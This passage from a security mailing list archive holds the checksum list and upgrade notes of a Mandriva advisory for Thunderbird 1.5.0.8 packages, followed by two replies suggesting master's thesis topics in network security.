 6594d0bb3f7770f168728827c1cf9f83  2007.0/x86_64/mozilla-thunderbird-enigmail-cs-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 1ee011c3c94c7b081f53b9a55996da0c  2007.0/x86_64/mozilla-thunderbird-enigmail-de-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 be24dd32e628b8294c1b87d200cf02dd  2007.0/x86_64/mozilla-thunderbird-enigmail-el-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 020acf8e510080a701c6278c6eb862ae  2007.0/x86_64/mozilla-thunderbird-enigmail-es-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 af4c92e4f3eaf833111572ead14c8c04  2007.0/x86_64/mozilla-thunderbird-enigmail-es_AR-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 7483c3a55198fcbc9be2c9750919a370  2007.0/x86_64/mozilla-thunderbird-enigmail-fi-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 753acdb58e6400659dab48ff78f371e7  2007.0/x86_64/mozilla-thunderbird-enigmail-fr-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 fb83f542bd12edda5e85d9873a08a938  2007.0/x86_64/mozilla-thunderbird-enigmail-hu-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 996bbfb13654cfc2180036ea6b1e61df  2007.0/x86_64/mozilla-thunderbird-enigmail-it-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 ff6217b99ab96a1444b6a758bf184ecf  2007.0/x86_64/mozilla-thunderbird-enigmail-ja-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 f15d9f053011068deba71fdc05dc6d46  2007.0/x86_64/mozilla-thunderbird-enigmail-nb-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 98f63b0dedef781ec16f8bebb6a032cb  2007.0/x86_64/mozilla-thunderbird-enigmail-nl-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 e5e42bb849d26a4f59fb6204d6ed9850  2007.0/x86_64/mozilla-thunderbird-enigmail-pl-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 8bc9d56d4778baf40b115eb805a506b3  2007.0/x86_64/mozilla-thunderbird-enigmail-pt-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 21c7d7ffd14a724e4ce9d96e99d0f3c7  2007.0/x86_64/mozilla-thunderbird-enigmail-pt_BR-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 9b115831c8ae36d7141c93a9d867d445  2007.0/x86_64/mozilla-thunderbird-enigmail-ru-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 d6efb3cdaba13c17dd31147011796614  2007.0/x86_64/mozilla-thunderbird-enigmail-sk-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 4239765036a0bffaa4fcff9fb076a221  2007.0/x86_64/mozilla-thunderbird-enigmail-sl-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 be87cc456600cb0dc18730ae3f75af92  2007.0/x86_64/mozilla-thunderbird-enigmail-sv-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 459367e42865a1de4374d2a9b8c36232  2007.0/x86_64/mozilla-thunderbird-enigmail-zh_CN-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 1e1b30720806b2c6ab650251f9756127  2007.0/x86_64/mozilla-thunderbird-es-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 70c5525bea63d291374706abfb4523c4  2007.0/x86_64/mozilla-thunderbird-es_AR-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 4addf81f6fdb0fe55d2274ba726d066e  2007.0/x86_64/mozilla-thunderbird-eu-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 9c9a1e6a7623a712f40666e77fd3f2b4  2007.0/x86_64/mozilla-thunderbird-fi-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 9cd9d0509bbe4d0bc7c092118253c237  2007.0/x86_64/mozilla-thunderbird-fr-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 b23236fc11caa38b1354893f1e9863e1  2007.0/x86_64/mozilla-thunderbird-ga-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 c5b898d7f04c26a34bb4223ee4547586  2007.0/x86_64/mozilla-thunderbird-gu_IN-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 8e114fec014131d472790035a1509783  2007.0/x86_64/mozilla-thunderbird-he-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 3eda3b36a83c550a1f52faf6adfb0b10  2007.0/x86_64/mozilla-thunderbird-hu-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 c336cc525567465d1649ee55c604d3a3  2007.0/x86_64/mozilla-thunderbird-it-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 476f974ea2e3b9ef971231b8b08e62f0  2007.0/x86_64/mozilla-thunderbird-ja-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 7878332de8134b9025b924315d6ffbf6  2007.0/x86_64/mozilla-thunderbird-ko-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 7602f9099c26d60e934f54918dd38e46  2007.0/x86_64/mozilla-thunderbird-lt-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 52ba4b91175db4376fd4c4e9018969c3  2007.0/x86_64/mozilla-thunderbird-mk-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 1e2bc31ee83c5c47f06953aba976a27d  2007.0/x86_64/mozilla-thunderbird-nb-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 47b180beb65802e89f7e6a8be7f33d15  2007.0/x86_64/mozilla-thunderbird-nl-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 6485a71b5d07fef3e337630aa53bb4c6  2007.0/x86_64/mozilla-thunderbird-pa_IN-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 6b5df9cad533fc75fc47191df5f3dabf  2007.0/x86_64/mozilla-thunderbird-pl-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 99b61d660a72eff639f78ec0422aeaf2  2007.0/x86_64/mozilla-thunderbird-pt_BR-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 99cfe247978fe85b5b5186bf12247f3a  2007.0/x86_64/mozilla-thunderbird-ru-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 8c393629997cea717c2f1e8d077a9344  2007.0/x86_64/mozilla-thunderbird-sk-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 be518e4b4833e6cb9d083871101be35b  2007.0/x86_64/mozilla-thunderbird-sl-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 8dedff0ffd0e7b7721b256f01821f188  2007.0/x86_64/mozilla-thunderbird-sv-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 05202d61506a60981fb9a317ce6a5d5d  2007.0/x86_64/mozilla-thunderbird-tr-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 0deda88ec857fb0c11b57555814a20ec  2007.0/x86_64/mozilla-thunderbird-zh_CN-1.5.0.8-1.1mdv2007.0.x86_64.rpm
 0f2f7928b2edfbe0ae5faf127b0ed066  2007.0/x86_64/nsinstall-1.5.0.8-1.1mdv2007.0.x86_64.rpm 
 e408368ca02e7efbbece9adbaaea7d56  2007.0/SRPMS/mozilla-thunderbird-1.5.0.8-1.1mdv2007.0.src.rpm
 7867a124b85e4a8098ec7b814267c1f5  2007.0/SRPMS/mozilla-thunderbird-enigmail-l10n-1.5.0.8-1.1mdv2007.0.src.rpm
 e776e0c4c5a6ff592af0c346bf8b4511  2007.0/SRPMS/mozilla-thunderbird-l10n-1.5.0.8-1.1mdv2007.0.src.rpm

 Corporate 3.0:
 71192ef0a8bd28533718191d287d8158  corporate/3.0/i586/mozilla-thunderbird-1.5.0.8-1.1.C30mdk.i586.rpm
 c0121a4a0192d7944b1f8d30c977ab38  corporate/3.0/i586/mozilla-thunderbird-bg-1.5.0.8-1.1.C30mdk.i586.rpm
 53c403f48cb8547f0eb646ab1b41b656  corporate/3.0/i586/mozilla-thunderbird-ca-1.5.0.8-1.1.C30mdk.i586.rpm
 032ebcc12942292620b05929e0583f3a  corporate/3.0/i586/mozilla-thunderbird-cs-1.5.0.8-1.1.C30mdk.i586.rpm
 c88d6e26aa75dab433abcf71f2962e5c  corporate/3.0/i586/mozilla-thunderbird-da-1.5.0.8-1.1.C30mdk.i586.rpm
 dcc54cb45829470f4267806696b46eca  corporate/3.0/i586/mozilla-thunderbird-de-1.5.0.8-1.1.C30mdk.i586.rpm
 e7ba899422d7cbfd343659b810e4ee52  corporate/3.0/i586/mozilla-thunderbird-devel-1.5.0.8-1.1.C30mdk.i586.rpm
 d987b44bd201c2a23b404751e13df538  corporate/3.0/i586/mozilla-thunderbird-el-1.5.0.8-1.1.C30mdk.i586.rpm
 9d496fa524a5226676f56ed87d2015ec  corporate/3.0/i586/mozilla-thunderbird-enigmail-1.5.0.8-1.1.C30mdk.i586.rpm
 eac64993c47963ede70eca5fb62e30b9  corporate/3.0/i586/mozilla-thunderbird-enigmail-ca-1.5.0.8-1.1.C30mdk.i586.rpm
 b5523fcbf2370d1805e1f917faaa31c8  corporate/3.0/i586/mozilla-thunderbird-enigmail-cs-1.5.0.8-1.1.C30mdk.i586.rpm
 1eb806fe5a429b52f010e16aeed4cb4a  corporate/3.0/i586/mozilla-thunderbird-enigmail-de-1.5.0.8-1.1.C30mdk.i586.rpm
 1a8da00f3e4033ec813df4548072ac9f  corporate/3.0/i586/mozilla-thunderbird-enigmail-el-1.5.0.8-1.1.C30mdk.i586.rpm
 3a2434c868a3b5799cb69c31d43f900c  corporate/3.0/i586/mozilla-thunderbird-enigmail-es-1.5.0.8-1.1.C30mdk.i586.rpm
 a1bb48121d53f83bf0efd303ea477b71  corporate/3.0/i586/mozilla-thunderbird-enigmail-es_AR-1.5.0.8-1.1.C30mdk.i586.rpm
 6f9d308c194ae42cfa0787afdebff2cc  corporate/3.0/i586/mozilla-thunderbird-enigmail-fi-1.5.0.8-1.1.C30mdk.i586.rpm
 bb3c3cf4056814131f8031471c81ac6f  corporate/3.0/i586/mozilla-thunderbird-enigmail-fr-1.5.0.8-1.1.C30mdk.i586.rpm
 4228aaf098c501a80af97469393482b5  corporate/3.0/i586/mozilla-thunderbird-enigmail-hu-1.5.0.8-1.1.C30mdk.i586.rpm
 3a95ad54416e2f002d1aaa32557cf947  corporate/3.0/i586/mozilla-thunderbird-enigmail-it-1.5.0.8-1.1.C30mdk.i586.rpm
 19e1eac0351d89760ee31b4c9ee4fcc4  corporate/3.0/i586/mozilla-thunderbird-enigmail-ja-1.5.0.8-1.1.C30mdk.i586.rpm
 1c21de0415bd0223237aa82795cc9600  corporate/3.0/i586/mozilla-thunderbird-enigmail-nb-1.5.0.8-1.1.C30mdk.i586.rpm
 a11487e4145c294a57a77491f6996748  corporate/3.0/i586/mozilla-thunderbird-enigmail-nl-1.5.0.8-1.1.C30mdk.i586.rpm
 31064002ac59d4857c3c45c3161580dc  corporate/3.0/i586/mozilla-thunderbird-enigmail-pl-1.5.0.8-1.1.C30mdk.i586.rpm
 fc88eeba422b084ffa67b77211248ef0  corporate/3.0/i586/mozilla-thunderbird-enigmail-pt-1.5.0.8-1.1.C30mdk.i586.rpm
 4ead83e3405e7469370b4f02a9254ddc  corporate/3.0/i586/mozilla-thunderbird-enigmail-pt_BR-1.5.0.8-1.1.C30mdk.i586.rpm
 3a15b707a6d7f8e9b25c1ccaea023333  corporate/3.0/i586/mozilla-thunderbird-enigmail-ru-1.5.0.8-1.1.C30mdk.i586.rpm
 1a8c565fd3b42069b2e42103d98dfab2  corporate/3.0/i586/mozilla-thunderbird-enigmail-sk-1.5.0.8-1.1.C30mdk.i586.rpm
 0040d479d7e55304c06df39b2233d12e  corporate/3.0/i586/mozilla-thunderbird-enigmail-sl-1.5.0.8-1.1.C30mdk.i586.rpm
 6fab1321b377748e22a6709b772d5159  corporate/3.0/i586/mozilla-thunderbird-enigmail-sv-1.5.0.8-1.1.C30mdk.i586.rpm
 1969ec5d6cc27df2f09f9733b5b37c6d  corporate/3.0/i586/mozilla-thunderbird-enigmail-zh_CN-1.5.0.8-1.1.C30mdk.i586.rpm
 0c34a8e8bd3f9011283fe990771a857a  corporate/3.0/i586/mozilla-thunderbird-es-1.5.0.8-1.1.C30mdk.i586.rpm
 68781ca20e2232457046bdab86b59462  corporate/3.0/i586/mozilla-thunderbird-es_AR-1.5.0.8-1.1.C30mdk.i586.rpm
 37c3909b8feb9a35208519ccf4ec8a46  corporate/3.0/i586/mozilla-thunderbird-eu-1.5.0.8-1.1.C30mdk.i586.rpm
 ea2febd0e93d9348fd580452f7adc0be  corporate/3.0/i586/mozilla-thunderbird-fi-1.5.0.8-1.1.C30mdk.i586.rpm
 2eac2aaeb4fe209f98aa85505f6a9b87  corporate/3.0/i586/mozilla-thunderbird-fr-1.5.0.8-1.1.C30mdk.i586.rpm
 d8d8fc30075f0848859cbe96b26404a7  corporate/3.0/i586/mozilla-thunderbird-ga-1.5.0.8-1.1.C30mdk.i586.rpm
 3af19a8b01fb316451132e6460c7deb0  corporate/3.0/i586/mozilla-thunderbird-gu_IN-1.5.0.8-1.1.C30mdk.i586.rpm
 f7aed893e50dff94f47d658d70093824  corporate/3.0/i586/mozilla-thunderbird-he-1.5.0.8-1.1.C30mdk.i586.rpm
 ab6ead860edf6de4935aa3bb4ecf4721  corporate/3.0/i586/mozilla-thunderbird-hu-1.5.0.8-1.1.C30mdk.i586.rpm
 a9b0bc2b2bcf186b5a284cba3d6cad19  corporate/3.0/i586/mozilla-thunderbird-it-1.5.0.8-1.1.C30mdk.i586.rpm
 373554b2032c20a61c48f4a4e11e5b57  corporate/3.0/i586/mozilla-thunderbird-ja-1.5.0.8-1.1.C30mdk.i586.rpm
 1a2efc51627d9f55929e1b33e20f5274  corporate/3.0/i586/mozilla-thunderbird-ko-1.5.0.8-1.1.C30mdk.i586.rpm
 27ab1d70b317c477b56df8223a8477b4  corporate/3.0/i586/mozilla-thunderbird-lt-1.5.0.8-1.1.C30mdk.i586.rpm
 0bcd50b34bec84016747f4919b43b8e1  corporate/3.0/i586/mozilla-thunderbird-mk-1.5.0.8-1.1.C30mdk.i586.rpm
 4b26e1653ccf78604c16b25ed7357dfb  corporate/3.0/i586/mozilla-thunderbird-nb-1.5.0.8-1.1.C30mdk.i586.rpm
 ea1a0d0349f9a2f26b23c7678d7e5736  corporate/3.0/i586/mozilla-thunderbird-nl-1.5.0.8-1.1.C30mdk.i586.rpm
 7d7c13e7a820c069b3c657adf57443d9  corporate/3.0/i586/mozilla-thunderbird-pa_IN-1.5.0.8-1.1.C30mdk.i586.rpm
 ef0755e523de702c802890f494ee5ea0  corporate/3.0/i586/mozilla-thunderbird-pl-1.5.0.8-1.1.C30mdk.i586.rpm
 f7618d53bff6c0764297f2352c5d0239  corporate/3.0/i586/mozilla-thunderbird-pt_BR-1.5.0.8-1.1.C30mdk.i586.rpm
 8df8db645153b5f7539044d5f892ad54  corporate/3.0/i586/mozilla-thunderbird-ru-1.5.0.8-1.1.C30mdk.i586.rpm
 d26cb2fbb5301bcf127ea4e4606f52b9  corporate/3.0/i586/mozilla-thunderbird-sk-1.5.0.8-1.1.C30mdk.i586.rpm
 f57d3dd11471a798542b87f0a3c68e82  corporate/3.0/i586/mozilla-thunderbird-sl-1.5.0.8-1.1.C30mdk.i586.rpm
 f3aede5440aeb78b59350fe56bb221d2  corporate/3.0/i586/mozilla-thunderbird-sv-1.5.0.8-1.1.C30mdk.i586.rpm
 bda7588d80565c17190fb407bdc3b1b2  corporate/3.0/i586/mozilla-thunderbird-tr-1.5.0.8-1.1.C30mdk.i586.rpm
 5f0764d5685d0836bd718fdc86b8a73a  corporate/3.0/i586/mozilla-thunderbird-zh_CN-1.5.0.8-1.1.C30mdk.i586.rpm
 2a1892c7e027dba761df43c98bb5e85f  corporate/3.0/i586/nsinstall-1.5.0.8-1.1.C30mdk.i586.rpm 
 04cdbf8cd4c1b9baf1b1c34e0c7bfcb9  corporate/3.0/SRPMS/mozilla-thunderbird-1.5.0.8-1.1.C30mdk.src.rpm
 98c5a4c000178cf57677fa6ee70adb71  corporate/3.0/SRPMS/mozilla-thunderbird-enigmail-l10n-1.5.0.8-1.1.C30mdk.src.rpm
 124ecce0dd9a26b565eef6c2f7e14401  corporate/3.0/SRPMS/mozilla-thunderbird-l10n-1.5.0.8-1.1.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 c109965ada094232d0958a8121be977a  corporate/3.0/x86_64/mozilla-thunderbird-1.5.0.8-1.1.C30mdk.x86_64.rpm
 e50d4054e85e4624b285067c75cfab18  corporate/3.0/x86_64/mozilla-thunderbird-bg-1.5.0.8-1.1.C30mdk.x86_64.rpm
 f8cc5e4a36961ef4db2b8632fc6734d9  corporate/3.0/x86_64/mozilla-thunderbird-ca-1.5.0.8-1.1.C30mdk.x86_64.rpm
 70e0a1878ce810ee835e7eca08a11e12  corporate/3.0/x86_64/mozilla-thunderbird-cs-1.5.0.8-1.1.C30mdk.x86_64.rpm
 50abb11664ca02e6d77cbf30396e5398  corporate/3.0/x86_64/mozilla-thunderbird-da-1.5.0.8-1.1.C30mdk.x86_64.rpm
 5565876286c51872fb0ff90df059f052  corporate/3.0/x86_64/mozilla-thunderbird-de-1.5.0.8-1.1.C30mdk.x86_64.rpm
 cdd3892a5ba2a7c1ffe29d009e9d23a9  corporate/3.0/x86_64/mozilla-thunderbird-devel-1.5.0.8-1.1.C30mdk.x86_64.rpm
 ba3e7a92e79e00cd74b722ab94d832eb  corporate/3.0/x86_64/mozilla-thunderbird-el-1.5.0.8-1.1.C30mdk.x86_64.rpm
 c11927081645df376c72f27e8ebc6a85  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-1.5.0.8-1.1.C30mdk.x86_64.rpm
 448172b7c753b48c81b2a2c5d337b9e5  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-ca-1.5.0.8-1.1.C30mdk.x86_64.rpm
 b83c0eb2158672f087fd5754ca27efad  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-cs-1.5.0.8-1.1.C30mdk.x86_64.rpm
 49b91f3eae7a0773ecce62f635a6dfe9  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-de-1.5.0.8-1.1.C30mdk.x86_64.rpm
 3a0cf5325721e29c4eba9ee7cbc7efb7  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-el-1.5.0.8-1.1.C30mdk.x86_64.rpm
 cadf1aff1e915adb9e14539eb04521db  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-es-1.5.0.8-1.1.C30mdk.x86_64.rpm
 8218118b837bf05b3603652f0d4c5690  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-es_AR-1.5.0.8-1.1.C30mdk.x86_64.rpm
 7c7190fc9ec1fc5774436ec7b0c92fd5  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-fi-1.5.0.8-1.1.C30mdk.x86_64.rpm
 a42f63c64470ba933d6239bdf8b1569c  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-fr-1.5.0.8-1.1.C30mdk.x86_64.rpm
 af8c5d7e3569278f3e9d364362be25b3  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-hu-1.5.0.8-1.1.C30mdk.x86_64.rpm
 c749a5b7ac03ad98919f83425fcbd4c2  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-it-1.5.0.8-1.1.C30mdk.x86_64.rpm
 ac82cd1f4fc0c5ed57be5b165cc65be4  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-ja-1.5.0.8-1.1.C30mdk.x86_64.rpm
 0fbd67977bdfc1b1f9aa3c846c80c244  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-nb-1.5.0.8-1.1.C30mdk.x86_64.rpm
 4d26f0c7b32d3888e1e5c4c14516a4df  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-nl-1.5.0.8-1.1.C30mdk.x86_64.rpm
 37fbc8358f1f11d5cb9f0e9b2fab3b26  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-pl-1.5.0.8-1.1.C30mdk.x86_64.rpm
 6bec775a601e84be547246ae5638d059  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-pt-1.5.0.8-1.1.C30mdk.x86_64.rpm
 0dc1c40ef6d1a233661048447db25543  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-pt_BR-1.5.0.8-1.1.C30mdk.x86_64.rpm
 7ec948cc8df84aae6b3d660bd4187208  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-ru-1.5.0.8-1.1.C30mdk.x86_64.rpm
 4b7ba48ffeff51709b26c8f315a4aaa1  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-sk-1.5.0.8-1.1.C30mdk.x86_64.rpm
 94fceae9b7bc6d48fe2677eecaaf11a6  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-sl-1.5.0.8-1.1.C30mdk.x86_64.rpm
 d578499c38c981f2b8cc55fc1351efef  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-sv-1.5.0.8-1.1.C30mdk.x86_64.rpm
 095291274be4a418d05c4e96cb441d90  corporate/3.0/x86_64/mozilla-thunderbird-enigmail-zh_CN-1.5.0.8-1.1.C30mdk.x86_64.rpm
 272b554e86966e103d3e7f42b5cba9db  corporate/3.0/x86_64/mozilla-thunderbird-es-1.5.0.8-1.1.C30mdk.x86_64.rpm
 52bd52c4d5eaad6fa541dd20db5411d0  corporate/3.0/x86_64/mozilla-thunderbird-es_AR-1.5.0.8-1.1.C30mdk.x86_64.rpm
 2536b28aa209a912ff74601db4e685b4  corporate/3.0/x86_64/mozilla-thunderbird-eu-1.5.0.8-1.1.C30mdk.x86_64.rpm
 484ad35799b9a8cd277754bf1b13d686  corporate/3.0/x86_64/mozilla-thunderbird-fi-1.5.0.8-1.1.C30mdk.x86_64.rpm
 42ff5a3a8320c4be3ffb1f1d74912f78  corporate/3.0/x86_64/mozilla-thunderbird-fr-1.5.0.8-1.1.C30mdk.x86_64.rpm
 8a46a1d9f9380c205699ce090d749ff2  corporate/3.0/x86_64/mozilla-thunderbird-ga-1.5.0.8-1.1.C30mdk.x86_64.rpm
 3c30c5aeee783bfabe34fb1ff7357d38  corporate/3.0/x86_64/mozilla-thunderbird-gu_IN-1.5.0.8-1.1.C30mdk.x86_64.rpm
 a90b14f77d6eed2228bfa55457803f6f  corporate/3.0/x86_64/mozilla-thunderbird-he-1.5.0.8-1.1.C30mdk.x86_64.rpm
 719239492f7d93b04f2c95902fccf94c  corporate/3.0/x86_64/mozilla-thunderbird-hu-1.5.0.8-1.1.C30mdk.x86_64.rpm
 f52bcdf19f10745e756f0d58616126df  corporate/3.0/x86_64/mozilla-thunderbird-it-1.5.0.8-1.1.C30mdk.x86_64.rpm
 79826e403152cbe90ddf3bd4d8d64abe  corporate/3.0/x86_64/mozilla-thunderbird-ja-1.5.0.8-1.1.C30mdk.x86_64.rpm
 18c08993c8f43c976be6cf2e8cfb2c35  corporate/3.0/x86_64/mozilla-thunderbird-ko-1.5.0.8-1.1.C30mdk.x86_64.rpm
 b17866029fe4244a77af59fbb55a07b9  corporate/3.0/x86_64/mozilla-thunderbird-lt-1.5.0.8-1.1.C30mdk.x86_64.rpm
 878f59fdb3ebb5929fc23437a17fb5ad  corporate/3.0/x86_64/mozilla-thunderbird-mk-1.5.0.8-1.1.C30mdk.x86_64.rpm
 d62fb25dc173e8b12be8623ae8fbf9bf  corporate/3.0/x86_64/mozilla-thunderbird-nb-1.5.0.8-1.1.C30mdk.x86_64.rpm
 266322718c7cedd78e89524940f15d55  corporate/3.0/x86_64/mozilla-thunderbird-nl-1.5.0.8-1.1.C30mdk.x86_64.rpm
 32c5fcab859aff66aaf704b997a1c625  corporate/3.0/x86_64/mozilla-thunderbird-pa_IN-1.5.0.8-1.1.C30mdk.x86_64.rpm
 17d7eeb0fbd25df1f76d5fa875ef7a3d  corporate/3.0/x86_64/mozilla-thunderbird-pl-1.5.0.8-1.1.C30mdk.x86_64.rpm
 4aabd47a35cb15547ccbe4eda1b521e8  corporate/3.0/x86_64/mozilla-thunderbird-pt_BR-1.5.0.8-1.1.C30mdk.x86_64.rpm
 1d8d27be2902605b0eae9dcbd89654cc  corporate/3.0/x86_64/mozilla-thunderbird-ru-1.5.0.8-1.1.C30mdk.x86_64.rpm
 6c116048a69b3c176831fde5ff0a252a  corporate/3.0/x86_64/mozilla-thunderbird-sk-1.5.0.8-1.1.C30mdk.x86_64.rpm
 e5bcb8518c5a61e63e62f90c363c67ae  corporate/3.0/x86_64/mozilla-thunderbird-sl-1.5.0.8-1.1.C30mdk.x86_64.rpm
 5569afdd940d28bdf37a1003d5d5d6b0  corporate/3.0/x86_64/mozilla-thunderbird-sv-1.5.0.8-1.1.C30mdk.x86_64.rpm
 d00245da432be7a7d268846891555930  corporate/3.0/x86_64/mozilla-thunderbird-tr-1.5.0.8-1.1.C30mdk.x86_64.rpm
 ee130a70f9b1fe5719fea63963f3db6d  corporate/3.0/x86_64/mozilla-thunderbird-zh_CN-1.5.0.8-1.1.C30mdk.x86_64.rpm
 81f41bebeb9eca34d7c27ab81ca41af6  corporate/3.0/x86_64/nsinstall-1.5.0.8-1.1.C30mdk.x86_64.rpm 
 04cdbf8cd4c1b9baf1b1c34e0c7bfcb9  corporate/3.0/SRPMS/mozilla-thunderbird-1.5.0.8-1.1.C30mdk.src.rpm
 98c5a4c000178cf57677fa6ee70adb71  corporate/3.0/SRPMS/mozilla-thunderbird-enigmail-l10n-1.5.0.8-1.1.C30mdk.src.rpm
 124ecce0dd9a26b565eef6c2f7e14401  corporate/3.0/SRPMS/mozilla-thunderbird-l10n-1.5.0.8-1.1.C30mdk.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (GNU/Linux)

iD8DBQFFU42GmqjQ0CJFipgRAiJgAKDQ8K7lgpOsNzXOQcSOrfcVrHQ4sACeLaqm
75x+jP9FNzlE7ieAV3r7Czs=
=DdKu
-----END PGP SIGNATURE-----



From shollatz at d.umn.edu  Fri Dec 15 23:01:50 2006
From: shollatz at d.umn.edu (scott hollatz)
Date: Fri, 15 Dec 2006 17:01:50 -0600 (CST)
Subject: [Full-disclosure] [OOT] Thesis for master degree
In-Reply-To: <828af05c0612150144x5fac7141qee559e4d3abff5b2@mail.gmail.com>
References: <828af05c0612150144x5fac7141qee559e4d3abff5b2@mail.gmail.com>
Message-ID: 

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

> Hello everyone, sorry for wasting your bandwidth
>
> I'm currently trying to find an interesting topic in computer networking
> security for my master degree thesis, I've read a lot of jurnal that related
> with computer networking and security. All journal seem to advanced for me,
> sometimes the journal has mathematical formula that I don't understand what
> is the point for. Maybe someone here willing to help me? an idea? or another
> journal website?

Networking and security *is* mathematical, don't be fooled.

A quick peek at "ACM Transactions on Information and System Security"
and "IEEE/ACM Transactions on Networking" should be a hint you need to
understand math to do a relatively decent masters thesis.

- --
scott hollatz                                        net shollatz at d.UMn.eDu
information technology systems and services          tel +1 218 726 8851
university of minnesota duluth mn usa                fax +1 218 726 7674
                                                                          --
                                               "Asn aD ta zlAp em uT zt33rg"
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (SunOS)

iD8DBQFFgylk4og1WWfEVRsRAqoeAJsEQjvD9758OFWl3hhOcoPgMX98NgCfXHuh
ZuitIDA2auiGOhFPl9xUFfw=
=ILTE
-----END PGP SIGNATURE-----



From xyberpix at xyberpix.com  Fri Dec 15 23:30:19 2006
From: xyberpix at xyberpix.com (xyberpix)
Date: Fri, 15 Dec 2006 23:30:19 +0000
Subject: [Full-disclosure] [OOT] Thesis for master degree
In-Reply-To: 
References: <828af05c0612150144x5fac7141qee559e4d3abff5b2@mail.gmail.com>
	
Message-ID: <6ACC9203-E28C-42D8-8783-CB77D24417A9@xyberpix.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

What about hacking ATM's, that'd make a great thesis from my side.
Also what about in-depth research into botnets?

xyberpix

On 15 Dec 2006, at 23:01, scott hollatz wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
>> Hello everyone, sorry for wasting your bandwidth
>>
>> I'm currently trying to find an interesting topic in computer  
>> networking
>> security for my master degree thesis, I've read a lot of jurnal  
>> that related
>> with computer networking and security. All journal seem to  
>> advanced for me,
>> sometimes the journal has mathematical formula that I don't  
>> understand what
>> is the point for. Maybe someone here willing to help me? an idea?  
>> or another
>> journal website?
>
> Networking and security *is* mathematical, don't be fooled.
>
> A quick peek at "ACM Transactions on Information and System Security"
> and "IEEE/ACM Transactions on Networking" should be a hint you need to
> understand math to do a relatively decent masters thesis.
>
> - --
> scott hollatz                                        net  
> shollatz at d.UMn.eDu
> information technology systems and services          tel +1 218 726  
> 8851
> university of minnesota duluth mn usa                fax +1 218 726  
> 7674
>                                                                        
>     --
>                                                "Asn aD ta zlAp em  
> uT zt33rg"
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.6 (SunOS)
>
> iD8DBQFFgylk4og1WWfEVRsRAqoeAJsEQjvD9758OFWl3hhOcoPgMX98NgCfXHuh
> ZuitIDA2auiGOhFPl9xUFfw=
> =ILTE
> -----END PGP SIGNATURE-----
>
> _______________________________________________
